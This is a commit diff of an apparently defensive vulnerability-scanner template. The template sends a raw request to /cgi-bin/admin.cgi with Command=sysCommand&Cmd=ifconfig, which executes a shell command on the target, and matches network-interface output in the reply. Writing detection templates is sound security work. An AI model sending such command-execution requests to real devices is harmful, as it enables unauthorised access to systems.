matchers update

patch-1
Ritik Chaddha 2024-04-04 23:06:17 +05:30 committed by GitHub
parent 29001265cc
commit cc0874c503
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 7 additions and 3 deletions

View File

@ -21,15 +21,19 @@ info:
http:
- raw:
- |
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfigff HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- type: word
part: body
words:
- '<CmdResult>'
- '</xml>'
- 'Ethernet'
- 'inet'
condition: and
- type: word
part: header